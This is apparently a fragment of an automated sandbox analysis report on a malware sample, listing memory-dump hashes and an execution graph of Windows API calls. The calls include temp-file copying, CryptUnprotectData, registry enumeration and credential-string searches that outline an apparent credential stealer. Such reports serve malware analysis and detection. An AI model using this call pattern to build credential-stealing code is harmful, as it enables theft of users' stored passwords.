                                  • Source File: 00000010.00000002.517252324.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_250000_rugtucw.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8p
                                  • API String ID: 0-2220451280
                                  • Opcode ID: a36baee1ffdef220d4036e6492a6264dd326773dc6215afa894b136cc5e01d12
                                  • Instruction ID: 9b848bab82ad1e60bdc713a18492805cb3924ce1ce6609a91805acfbcee9120c
                                  • Opcode Fuzzy Hash: a36baee1ffdef220d4036e6492a6264dd326773dc6215afa894b136cc5e01d12
                                  • Instruction Fuzzy Hash: D21148766193946FC303A774F464B553F658F9A311F054097D5068B2A3C9609D1A87A2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.517252324.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_250000_rugtucw.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: tPp
                                  • API String ID: 0-1477601333
                                  • Opcode ID: 2dd4abac6602ddf9588e788fe3a70cbf0c2172d7b0b8b8ca36eca5bfb470f2a6
                                  • Instruction ID: 996e7007597b4df3e19fa45fdc0c05ca2720c4bb9607821097ae35dcf3ef5c9e
                                  • Opcode Fuzzy Hash: 2dd4abac6602ddf9588e788fe3a70cbf0c2172d7b0b8b8ca36eca5bfb470f2a6
                                  • Instruction Fuzzy Hash: C2213A353006118FC759EB38C468A2D7BF6AF8A72532504A9E946CF372DE35DC46CB91
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.517252324.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_250000_rugtucw.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6069530a80fe7f150f1ed2c2f414a72f3f259cffed99e086a1674ce13085d0d9
                                  • Instruction ID: 2a16f6f3bebc115c41ee90f033082dd98b1dbf35b53d87155dc210397533102e
                                  • Opcode Fuzzy Hash: 6069530a80fe7f150f1ed2c2f414a72f3f259cffed99e086a1674ce13085d0d9
                                  • Instruction Fuzzy Hash: 4ED17C34211306DFD709EF24E888B2A7BE2BF89305F648869DC068B365DB71ED55CB94
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.517252324.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_250000_rugtucw.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 866681c815c76829f3a7e6e9202fe1c4e0efa4fd5db99c24b0bbc8637bdcdc29
                                  • Instruction ID: e150b4d60be5eafeb321264ecaf76b9ee6a869415e189669eefd6943dfd78726
                                  • Opcode Fuzzy Hash: 866681c815c76829f3a7e6e9202fe1c4e0efa4fd5db99c24b0bbc8637bdcdc29
                                  • Instruction Fuzzy Hash: 41012B76700711BFC321AB25F85CE2B3BA4EB8D7913014595FC028B315CA70DC148BA4
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.517252324.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_250000_rugtucw.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cdec98a37b86465a652767303613df7b8d34425d15073fd5eb597212a88c6326
                                  • Instruction ID: 100768f9b3caf146e524eef25ef04b719566095c65af8319c4106c61eb7fdd0c
                                  • Opcode Fuzzy Hash: cdec98a37b86465a652767303613df7b8d34425d15073fd5eb597212a88c6326
                                  • Instruction Fuzzy Hash: B0F059727093642FD30917782C55AAF7BAEDFCA21431805BAE409C7343DD748D0683E0
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.517252324.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_250000_rugtucw.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d763ebd1ee52072eb7cf0850f4554f9cc8559c6acaafb2eb9c8e11c1363234b3
                                  • Instruction ID: d28db79bb5a1d13e584b738ca196a49d652f9e7dbf8470a1e67e8d5da4b60e29
                                  • Opcode Fuzzy Hash: d763ebd1ee52072eb7cf0850f4554f9cc8559c6acaafb2eb9c8e11c1363234b3
                                  • Instruction Fuzzy Hash: B5F0E571A0C3896FC706DFB5985C9CA7FF8EE4A11070484EBE408C3152E53059048761
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.517252324.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_250000_rugtucw.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a9f94cc9fbae01ce76d17a922e32f8634dbb582c3679bb2015785da1b26708a2
                                  • Instruction ID: 996d95c0c50dd9fc7605ba62556484f9183f1bdbd8c96300f57d6df013f4b7cc
                                  • Opcode Fuzzy Hash: a9f94cc9fbae01ce76d17a922e32f8634dbb582c3679bb2015785da1b26708a2
                                  • Instruction Fuzzy Hash: A2E06DB2A04209AFCB04FFA9F84C4DE7BE9FB48262B108066E609D2210EA7058408790
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.517252324.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_250000_rugtucw.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 13067118a5afa5afd8195a47de0bebbcf98e0817d8880e635562b054597eaf71
                                  • Instruction ID: be86f8146a305927d1b59f6c2be998f35015936dcf78d2f33f48b119c7b4bbdd
                                  • Opcode Fuzzy Hash: 13067118a5afa5afd8195a47de0bebbcf98e0817d8880e635562b054597eaf71
                                  • Instruction Fuzzy Hash: 1FE0C23450D3C4DFC70BEF20F92CA213FA49B4E201B4500DBE9818B2A7C6746C58CBA8
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.517252324.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_250000_rugtucw.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 770f573e9d04451bbf5537547faebe085a499df3a0c6acbd54e6e1d5e51f840f
                                  • Instruction ID: 1c63723eec2ae7fb08ce5936625c1f354f319e01274ab14efa5b6b765425b9a1
                                  • Opcode Fuzzy Hash: 770f573e9d04451bbf5537547faebe085a499df3a0c6acbd54e6e1d5e51f840f
                                  • Instruction Fuzzy Hash: B5D0A736A08B616BDB1156F5BC0A38D7F248A16255F0400BAD848C7193E6148D2487D2
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.517252324.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_250000_rugtucw.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd95d2033945dbc6dbeb37902534efa501f99cda51150e13bb7a28e6c06e9cd4
                                  • Instruction ID: e8149fa341d5a6c10e08b9c0bb96e7616393d8220ba6c2192441600677dac04d
                                  • Opcode Fuzzy Hash: cd95d2033945dbc6dbeb37902534efa501f99cda51150e13bb7a28e6c06e9cd4
                                  • Instruction Fuzzy Hash: CCC002D499E3C52ED707673068297543F751B87219FC950CB91D4560F3D45C096DD32A

                                  Execution Graph

                                  Execution Coverage:2.5%
                                  Dynamic/Decrypted Code Coverage:53.6%
                                  Signature Coverage:16.2%
                                  Total number of Nodes:586
                                  Total number of Limit Nodes:30
                                  execution_graph 27920 8a40e 27923 8a426 27920->27923 27927 8a4a2 27920->27927 27921 8a469 memcpy 27921->27927 27922 8a44a memcpy 27931 8a45d 27922->27931 27923->27921 27923->27922 27923->27927 27924 8a524 27933 8a2aa 17 API calls 27924->27933 27926 8a532 27928 8a53e memset 27926->27928 27926->27931 27927->27924 27929 8a501 27927->27929 27928->27931 27932 8a1c6 18 API calls 27929->27932 27932->27931 27933->27926 28440 a0e0c 22 API calls 28441 8ca01 _allmul _alldiv _allmul _alldiv 28332 b9000 28 API calls 28335 c5401 memset memcpy memcpy memset memcpy 28056 84406 28061 82e30 StrStrIW 28056->28061 28059 82e30 22 API calls 28060 8443a 28059->28060 28062 82ebc 28061->28062 28063 82e57 28061->28063 28087 81000 GetProcessHeap RtlAllocateHeap 28062->28087 28065 819e5 9 API calls 28063->28065 28067 82e68 28065->28067 28066 82ed0 RegOpenKeyExW 28068 82f68 28066->28068 28078 82eee 28066->28078 28067->28062 28088 81bc5 10 API calls 28067->28088 28069 81011 3 API calls 28068->28069 28072 82f6f 28069->28072 28071 82f50 RegEnumKeyExW 28074 82f5e RegCloseKey 28071->28074 28071->28078 28072->28059 28073 82e75 28075 82eb5 28073->28075 28077 81afe 10 API calls 28073->28077 28074->28068 28079 81011 3 API calls 28075->28079 28076 81953 6 API calls 28076->28078 28080 82e83 28077->28080 28078->28071 28078->28076 28081 8199d 9 API calls 28078->28081 28083 82e30 18 API calls 28078->28083 28086 81011 3 API calls 28078->28086 28079->28062 28082 8199d 9 API calls 28080->28082 28085 82e91 28080->28085 28081->28078 28082->28085 28083->28078 28084 81011 3 API calls 28084->28075 28085->28084 28086->28078 28087->28066 28088->28073 28337 85818 _alldiv _allrem _allmul 28444 af21c 23 API calls 28339 a7c28 8 API calls 28341 8482b 14 API calls 28342 a742e 24 API calls 28345 be024 83 API calls 28346 9943d 34 API calls 28451 a13ca 92 API calls 27934 83c40 27935 81b6a 2 API calls 27934->27935 27936 83c50 27935->27936 27937 83dfa 27936->27937 27970 81000 GetProcessHeap RtlAllocateHeap 27936->27970 27939 83c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27971 d4bec 27939->27971 27941 83dec DeleteFileW 27942 81011 3 API calls 27941->27942 27942->27937 27943 83c9a 27943->27941 27944 83de3 27943->27944 27982 81000 GetProcessHeap RtlAllocateHeap 27943->27982 27990 d3848 66 API calls 27944->27990 27947 83cce 27983 a02ec 84 API calls 27947->27983 27949 83da8 27986 9fb92 83 API calls 27949->27986 27950 81fa7 19 API calls 27964 83cd9 27950->27964 27952 83db1 lstrlen 27953 83db9 27952->27953 27954 83ddc 27952->27954 27987 81798 lstrlen 27953->27987 27955 81011 3 API calls 27954->27955 27955->27944 27957 83dc8 27988 81798 lstrlen 27957->27988 27958 83d2b lstrlen 27961 83d35 lstrlen 27958->27961 27958->27964 27960 83dd2 27989 81798 lstrlen 27960->27989 27961->27964 27964->27949 27964->27950 27964->27958 27984 81000 GetProcessHeap RtlAllocateHeap 27964->27984 27985 a02ec 84 API calls 27964->27985 27966 83d46 wsprintfA lstrlen 27967 83d71 27966->27967 27968 83d83 lstrcat 27966->27968 27967->27968 27969 81011 3 API calls 27968->27969 27969->27964 27970->27939 27991 d307c 27971->27991 27973 d4c01 27981 d4c44 27973->27981 28001 9c54d memset 27973->28001 27975 d4c18 28002 9c871 21 API calls 27975->28002 27977 d4c2a 28003 9c518 19 API calls 27977->28003 27979 d4c33 27979->27981 28004 d486f 79 API calls 27979->28004 27981->27943 27982->27947 27983->27964 27984->27966 27985->27964 27986->27952 27987->27957 27988->27960 27989->27954 27990->27941 27992 d3095 27991->27992 28000 d308e 27991->28000 27994 d30ad 27992->27994 28018 866ce 17 API calls 27992->28018 27995 d30ed memset 27994->27995 27994->28000 27996 d3108 27995->27996 27997 d3116 27996->27997 28019 8c59d 17 API calls 27996->28019 27997->28000 28005 86512 27997->28005 28000->27973 28001->27975 28002->27977 28003->27979 28004->27981 28020 8685c 28005->28020 28007 8651d 28007->28000 28008 86519 28008->28007 28009 8bfec GetSystemInfo 28008->28009 28023 865bd 28009->28023 28011 8c00e 28012 865bd 16 API calls 28011->28012 28013 8c01a 28012->28013 28014 865bd 16 API calls 28013->28014 28015 8c026 28014->28015 28016 865bd 16 API calls 28015->28016 28017 8c032 28016->28017 28017->28000 28018->27994 28019->27997 28021 d307c 17 API calls 28020->28021 28022 86861 28021->28022 28022->28008 28024 d307c 17 API calls 28023->28024 28025 865c2 28024->28025 28025->28011 28349 84440 24 API calls 28453 e9238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 28350 a6440 84 API calls 28455 85e5a 28 API calls 28175 8105d VirtualFree 28352 c7452 19 API calls 28458 b3e6b 20 API calls 28354 9f86a 31 API calls 28355 84c6d 17 API calls 28356 c2864 25 API calls 28358 d507d 24 API calls 28361 9807c 23 API calls 28462 a0670 _allmul _allmul _allmul _alldvrm 28367 c348f 27 API calls 28465 90284 26 API calls 28094 83098 28095 81b6a 2 API calls 28094->28095 28097 830af 28095->28097 28096 833a9 28097->28096 28118 81000 GetProcessHeap RtlAllocateHeap 28097->28118 28099 830ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28100 d4bec 79 API calls 28099->28100 28103 83126 28100->28103 28101 8339b DeleteFileW 28102 81011 3 API calls 28101->28102 28102->28096 28103->28101 28104 83392 28103->28104 28119 a02ec 84 API calls 28103->28119 28123 d3848 66 API calls 28104->28123 28107 83381 28122 9fb92 83 API calls 28107->28122 28109 8319c RtlCompareMemory 28110 832cd CryptUnprotectData 28109->28110 28117 83155 28109->28117 28110->28117 28112 831d0 RtlZeroMemory 28120 81000 GetProcessHeap RtlAllocateHeap 28112->28120 28114 81011 3 API calls 28114->28117 28115 81798 lstrlen 28115->28117 28116 81fa7 19 API calls 28116->28117 28117->28107 28117->28109 28117->28110 28117->28112 28117->28114 28117->28115 28117->28116 28121 a02ec 84 API calls 28117->28121 28118->28099 28119->28117 28120->28117 28121->28117 28122->28104 28123->28101 28467 96698 30 API calls 28370 c2c9e 95 API calls 28468 8629a 23 API calls 28471 a069d _allmul 28375 9b0aa 74 API calls 28474 856a2 _allrem 28035 824a4 28038 82198 RtlZeroMemory GetVersionExW 28035->28038 28039 821cb LoadLibraryW 28038->28039 28041 8249b 28039->28041 28042 821fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28039->28042 28043 82492 FreeLibrary 28042->28043 28048 82244 28042->28048 28043->28041 28044 8247b 28044->28043 28045 822e1 RtlCompareMemory 28045->28048 28046 82365 RtlCompareMemory 28046->28048 28047 81953 6 API calls 28047->28048 28048->28043 28048->28044 28048->28045 28048->28046 28048->28047 28049 81011 GetProcessHeap HeapFree VirtualQuery 28048->28049 28050 823f8 StrStrIW 28048->28050 28051 817c0 9 API calls 28048->28051 28049->28048 28050->28048 28051->28048 28055 82ea5 25 API calls 28089 89ea7 RtlAllocateHeap 28090 89ed9 28089->28090 28091 89ec1 28089->28091 28093 87f70 17 API calls 28091->28093 28093->28090 28376 9b8a6 80 API calls 28377 978b9 33 API calls 28475 a12bb _allmul _allmul _allmul _alldvrm _allmul 28378 a13ca 77 API calls 28477 a13ca 79 API calls 28478 896bc _alldiv _alldiv _alldiv _alldiv _allmul 28379 86eb7 24 API calls 28380 848b1 22 API calls 28381 82cb5 16 API calls 28481 afaca _allmul strcspn 28382 86eb7 22 API calls 28383 95cca 32 API calls 28385 d34ca 47 API calls 28387 85cc5 22 API calls 28486 ac6da 23 API calls 28388 b70de 24 API calls 27907 89ee8 27908 89f1a 27907->27908 27909 89ef1 HeapFree 27907->27909 27909->27908 27910 89f02 27909->27910 27912 87f70 17 API calls 27910->27912 27912->27908 28394 8f4ec 20 API calls 28395 828f8 100 API calls 28490 a13ca 78 API calls 28396 84cf5 memset 28491 b9ef6 104 API calls 28397 a13ca 79 API calls 27726 84108 27729 84045 27726->27729 27748 83fdc 27729->27748 27732 83fdc 50 API calls 27733 8407a 27732->27733 27734 83fdc 50 API calls 27733->27734 27735 8408d 27734->27735 27736 83fdc 50 API calls 27735->27736 27737 840a0 27736->27737 27738 83fdc 50 API calls 27737->27738 27739 840b3 27738->27739 27740 83fdc 50 API calls 27739->27740 27741 840c6 27740->27741 27742 83fdc 50 API calls 27741->27742 27743 840d9 27742->27743 27744 83fdc 50 API calls 27743->27744 27745 840ec 27744->27745 27746 83fdc 50 API calls 27745->27746 27747 840ff 27746->27747 27759 81afe 27748->27759 27751 8403f 27751->27732 27755 84038 27822 81011 27755->27822 27827 81000 GetProcessHeap RtlAllocateHeap 27759->27827 27761 81b0d SHGetFolderPathW 27762 81b20 27761->27762 27766 81b63 27761->27766 27763 81011 3 API calls 27762->27763 27764 81b28 27763->27764 27764->27766 27828 819e5 27764->27828 27766->27751 27767 8199d 27766->27767 27843 81953 27767->27843 27769 819a6 27770 81011 3 API calls 27769->27770 27771 819af 27770->27771 27772 83ed9 27771->27772 27773 83eed 27772->27773 27774 83fd1 27772->27774 27773->27774 27849 81000 GetProcessHeap RtlAllocateHeap 27773->27849 27774->27755 27794 81d4a 27774->27794 27776 83f01 PathCombineW FindFirstFileW 27777 83fca 27776->27777 27778 83f27 27776->27778 27781 81011 3 API calls 27777->27781 27779 83f78 lstrcmpiW 27778->27779 27780 83f32 lstrcmpiW 27778->27780 27850 81000 GetProcessHeap RtlAllocateHeap 27778->27850 27779->27778 27782 83faf FindNextFileW 27779->27782 27780->27782 27783 83f42 lstrcmpiW 27780->27783 27781->27774 27782->27778 27784 83fc3 FindClose 27782->27784 27783->27782 27785 83f56 27783->27785 27784->27777 27867 81000 GetProcessHeap RtlAllocateHeap 27785->27867 27788 83f92 PathCombineW 27851 83e04 27788->27851 27789 83f60 PathCombineW 27791 83ed9 23 API calls 27789->27791 27792 83f76 27791->27792 27793 81011 3 API calls 27792->27793 27793->27782 27795 81d62 27794->27795 27796 81eb4 27794->27796 27795->27796 27900 819b4 27795->27900 27796->27755 27799 81d79 27801 81953 6 API calls 27799->27801 27800 81d8b 27802 81953 6 API calls 27800->27802 27803 81d83 27801->27803 27802->27803 27803->27796 27804 81da3 FindFirstFileW 27803->27804 27805 81ead 27804->27805 27811 81dba 27804->27811 27806 81011 3 API calls 27805->27806 27806->27796 27807 81dc5 lstrcmpiW 27809 81ddd lstrcmpiW 27807->27809 27810 81e8e FindNextFileW 27807->27810 27808 81953 6 API calls 27808->27811 27809->27810 27819 81df5 27809->27819 27810->27811 27812 81ea2 FindClose 27810->27812 27811->27807 27811->27808 27813 8199d 9 API calls 27811->27813 27812->27805 27815 81e54 lstrcmpiW 27813->27815 27814 819b4 lstrlenW 27814->27819 27815->27819 27817 81011 3 API calls 27817->27810 27818 81953 6 API calls 27818->27819 27819->27814 27819->27817 27819->27818 27820 8199d 9 API calls 27819->27820 27821 81d4a 12 API calls 27819->27821 27904 81cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27819->27904 27820->27819 27821->27819 27905 81162 VirtualQuery 27822->27905 27825 8102d 27825->27751 27826 8101d GetProcessHeap HeapFree 27826->27825 27827->27761 27829 819fa RegOpenKeyExW 27828->27829 27830 819f7 27828->27830 27831 81a28 RegQueryValueExW 27829->27831 27832 81aa2 27829->27832 27830->27829 27834 81a94 RegCloseKey 27831->27834 27835 81a46 27831->27835 27833 81ab9 27832->27833 27836 819e5 5 API calls 27832->27836 27833->27764 27834->27832 27834->27833 27835->27834 27842 81000 GetProcessHeap RtlAllocateHeap 27835->27842 27836->27833 27838 81a61 RegQueryValueExW 27839 81a8b 27838->27839 27840 81a7f 27838->27840 27841 81011 3 API calls 27839->27841 27840->27834 27841->27840 27842->27838 27844 81964 lstrlenW lstrlenW 27843->27844 27848 81000 GetProcessHeap RtlAllocateHeap 27844->27848 27847 81986 lstrcatW lstrcatW 27847->27769 27848->27847 27849->27776 27850->27788 27868 81b6a 27851->27868 27853 83e0f 27857 83ec7 27853->27857 27874 81c31 CreateFileW 27853->27874 27857->27792 27861 83ebf 27862 81011 3 API calls 27861->27862 27862->27857 27863 83ea8 27866 81011 3 API calls 27863->27866 27864 83e6c RtlCompareMemory 27864->27863 27865 83e7e CryptUnprotectData 27864->27865 27865->27863 27866->27861 27867->27789 27869 81b99 27868->27869 27870 81b6f 27868->27870 27869->27853 27870->27869 27871 81b76 CreateFileW 27870->27871 27872 81b8d CloseHandle 27871->27872 27873 81b95 27871->27873 27872->27873 27873->27853 27875 81c98 27874->27875 27876 81c53 GetFileSize 27874->27876 27875->27857 27885 82fb1 27875->27885 27877 81c90 CloseHandle 27876->27877 27878 81c63 27876->27878 27877->27875 27897 81000 GetProcessHeap RtlAllocateHeap 27878->27897 27880 81c6b ReadFile 27881 81c80 27880->27881 27882 81c87 27880->27882 27881->27877 27881->27882 27883 81011 3 API calls 27882->27883 27884 81c8e 27883->27884 27884->27877 27886 82fb8 StrStrIA 27885->27886 27887 82ff2 27885->27887 27886->27887 27888 82fcd lstrlen StrStrIA 27886->27888 27887->27857 27891 8123b lstrlen 27887->27891 27888->27887 27889 82fe7 27888->27889 27898 8190b 6 API calls 27889->27898 27892 8129b 27891->27892 27893 81256 CryptStringToBinaryA 27891->27893 27892->27861 27892->27863 27892->27864 27893->27892 27894 81272 27893->27894 27899 81000 GetProcessHeap RtlAllocateHeap 27894->27899 27896 8127e CryptStringToBinaryA 27896->27892 27897->27880 27898->27887 27899->27896 27901 819bc 27900->27901 27903 819d4 27900->27903 27902 819c3 lstrlenW 27901->27902 27901->27903 27902->27903 27903->27799 27903->27800 27904->27819 27906 81019 27905->27906 27906->27825 27906->27826 28493 a5f08 92 API calls 28026 e9304 28028 e9344 28026->28028 28027 e9584 28027->28027 28028->28027 28029 e94da LoadLibraryA 28028->28029 28033 e951f VirtualProtect VirtualProtect 28028->28033 28030 e94f1 28029->28030 28030->28028 28032 e9503 GetProcAddress 28030->28032 28032->28030 28034 e9519 28032->28034 28033->28027 28496 b6f06 24 API calls 28170 8411b 28171 84045 50 API calls 28170->28171 28172 8412b 28171->28172 28173 84045 50 API calls 28172->28173 28174 8413b 28173->28174 28399 984a7 30 API calls 28400 d4116 30 API calls 28499 82b15 50 API calls 28500 a6b14 memset memcpy _allmul 28263 83717 28264 81b6a 2 API calls 28263->28264 28267 8372e 28264->28267 28265 83c23 28267->28265 28313 81000 GetProcessHeap RtlAllocateHeap 28267->28313 28268 8376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28269 837a8 28268->28269 28270 8379e 28268->28270 28272 d4bec 79 API calls 28269->28272 28314 8349b 31 API calls 28270->28314 28275 837b3 28272->28275 28273 83c15 DeleteFileW 28274 81011 3 API calls 28273->28274 28274->28265 28275->28273 28276 83c0c 28275->28276 28315 81000 GetProcessHeap RtlAllocateHeap 28275->28315 28325 d3848 66 API calls 28276->28325 28279 837e3 28316 a02ec 84 API calls 28279->28316 28281 83bcc 28321 9fb92 83 API calls 28281->28321 28283 83bd9 lstrlen 28284 83c05 28283->28284 28285 83be5 28283->28285 28287 81011 3 API calls 28284->28287 28322 81798 lstrlen 28285->28322 28287->28276 28288 83bf3 28323 81798 lstrlen 28288->28323 28289 83833 RtlCompareMemory 28290 83a37 CryptUnprotectData 28289->28290 28307 837ee 28289->28307 28290->28307 28293 83bfc 28324 81798 lstrlen 28293->28324 28295 83867 RtlZeroMemory 28317 81000 GetProcessHeap RtlAllocateHeap 28295->28317 28297 81011 3 API calls 28297->28307 28298 83b0f lstrlen 28299 83b21 lstrlen 28298->28299 28298->28307 28299->28307 28300 81000 GetProcessHeap RtlAllocateHeap 28300->28307 28301 81fa7 19 API calls 28301->28307 28302 83987 lstrlen 28305 83999 lstrlen 28302->28305 28302->28307 28304 83b66 wsprintfA lstrlen 28306 83ba3 lstrcat 28304->28306 28304->28307 28305->28307 28306->28307 28307->28281 28307->28289 28307->28290 28307->28295 28307->28297 28307->28298 28307->28300 28307->28301 28307->28302 28307->28306 28318 82112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28307->28318 28319 82112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28307->28319 28320 a02ec 84 API calls 28307->28320 28309 839de wsprintfA lstrlen 28310 83a1b lstrcat 28309->28310 28311 83a0d 28309->28311 28312 81011 3 API calls 28310->28312 28311->28310 28312->28307 28313->28268 28314->28269 28315->28279 28316->28307 28317->28307 28318->28309 28319->28304 28320->28307 28321->28283 28322->28288 28323->28293 28324->28284 28325->28273 28402 90128 23 API calls 28501 8cb2a _allmul _allmul 28502 b072d 19 API calls 28405 89925 18 API calls 28504 cc322 27 API calls 28508 97b3d 18 API calls 28254 8413e 28255 84045 50 API calls 28254->28255 28256 8414e 28255->28256 28510 90f3e 50 API calls 28407 af130 22 API calls 28511 9ff32 21 API calls 28408 99534 39 API calls 28512 9f74d 18 API calls 28513 a6340 82 API calls 28409 ae141 18 API calls 28411 8a558 18 API calls 28412 ae558 22 API calls 28517 8ab68 20 API calls 28413 b5d6f 20 API calls 28414 9a16f 33 API calls 28518 b7762 memset memset memcpy 28520 a7f67 24 API calls 28416 9c97b memcpy 28326 82f77 28327 82e30 22 API calls 28326->28327 28328 82f9a 28327->28328 28329 82e30 22 API calls 28328->28329 28330 82fab 28329->28330 28419 a7d8b _allrem memcpy 28523 9ab8b 19 API calls 28420 81198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 28526 8bf9a _alldiv 28527 81b9d GetFileAttributesW 28528 9cb91 18 API calls 28422 9fd97 19 API calls 28529 a13ca 78 API calls 28531 c53ad memset memcpy memset memcpy 28424 911a0 33 API calls 28532 a8ba6 7 API calls 28425 a9dbc 25 API calls 28533 a13ca 79 API calls 28534 c33b7 27 API calls 27913 89fc8 27914 89fd3 27913->27914 27916 89fd8 27913->27916 27915 89ff4 HeapCreate 27915->27914 27917 8a004 27915->27917 27916->27914 27916->27915 27919 87f70 17 API calls 27917->27919 27919->27914 28537 a13ca 79 API calls 28427 d3dc8 24 API calls 28540 b73c4 22 API calls 28124 843d9 28131 84317 _alloca_probe RegOpenKeyW 28124->28131 28127 84317 25 API calls 28128 843f5 28127->28128 28129 84317 25 API calls 28128->28129 28130 84403 28129->28130 28132 843cf 28131->28132 28133 84343 RegEnumKeyExW 28131->28133 28132->28127 28134 843c4 RegCloseKey 28133->28134 28138 8436d 28133->28138 28134->28132 28135 81953 6 API calls 28135->28138 28136 8199d 9 API calls 28136->28138 28138->28135 28138->28136 28139 81011 3 API calls 28138->28139 28142 8418a 28138->28142 28140 8439b RegEnumKeyExW 28139->28140 28140->28138 28141 843c3 28140->28141 28141->28134 28144 8430d 28142->28144 28151 841a3 28142->28151 28143 819e5 9 API calls 28143->28151 28144->28138 28146 84205 wsprintfW 28147 81011 3 API calls 28146->28147 28147->28151 28149 81011 GetProcessHeap HeapFree VirtualQuery 28149->28151 28150 817c0 9 API calls 28150->28151 28151->28143 28151->28144 28151->28149 28151->28150 28152 81000 GetProcessHeap RtlAllocateHeap 28151->28152 28153 81fce GetProcessHeap HeapFree VirtualQuery CryptUnprotectData RtlMoveMemory 28151->28153 28152->28146 28153->28151 28541 8ebd9 24 API calls 28176 815dd 28177 81600 28176->28177 28178 815f3 lstrlen 28176->28178 28187 81000 GetProcessHeap RtlAllocateHeap 28177->28187 28178->28177 28180 81608 lstrcat 28181 8163d lstrcat 28180->28181 28182 81644 28180->28182 28181->28182 28188 81333 28182->28188 28185 81011 3 API calls 28186 81667 28185->28186 28187->28180 28211 81000 GetProcessHeap RtlAllocateHeap 28188->28211 28190 81357 28212 8106c lstrlen MultiByteToWideChar 28190->28212 28192 81366 28213 812a3 RtlZeroMemory 28192->28213 28195 813b8 RtlZeroMemory 28198 813ed 28195->28198 28196 815b5 28197 81011 3 API calls 28196->28197 28199 815d2 28197->28199 28198->28196 28215 81000 GetProcessHeap RtlAllocateHeap 28198->28215 28199->28185 28201 814a7 wsprintfW 28203 814c9 28201->28203 28202 815a1 28204 81011 3 API calls 28202->28204 28203->28202 28216 81000 GetProcessHeap RtlAllocateHeap 28203->28216 28204->28196 28206 8159a 28208 81011 3 API calls 28206->28208 28207 81533 28207->28206 28217 8104c VirtualAlloc 28207->28217 28208->28202 28210 8158a RtlMoveMemory 28210->28206 28211->28190 28212->28192 28214 812c5 28213->28214 28214->28195 28214->28196 28215->28201 28216->28207 28217->28210 28218 863dd 28221 8b87b 28218->28221 28219 863f4 28222 8b88d memset 28221->28222 28228 8b8e5 28222->28228 28226 8ba3c 28226->28219 28228->28222 28228->28226 28230 8ba14 28228->28230 28231 8ba41 28228->28231 28236 8b609 28228->28236 28239 8b828 28228->28239 28243 8b64b 18 API calls 28228->28243 28244 8bb9f 18 API calls 28228->28244 28245 8a2aa 17 API calls 28228->28245 28246 8a1c6 18 API calls 28230->28246 28248 d52ae _allmul 28231->28248 28233 8ba32 28247 d4db2 17 API calls 28233->28247 28249 8a08a 28236->28249 28238 8b60f 28238->28228 28240 8b842 GetFileAttributesExW 28239->28240 28241 8b861 28240->28241 28242 8b852 28240->28242 28241->28228 28242->28240 28242->28241 28243->28228 28244->28228 28245->28228 28246->28233 28247->28226 28248->28226 28250 8a0a4 28249->28250 28252 8a0aa 28250->28252 28253 86a81 memset 28250->28253 28252->28238 28253->28252 28430 8c9ea _allmul _alldiv 28432 d55eb IsProcessorFeaturePresent 28434 899e1 strncmp 28435 8b1e3 23 API calls 28542 a7be1 29 API calls 28154 847fa 28161 8479c 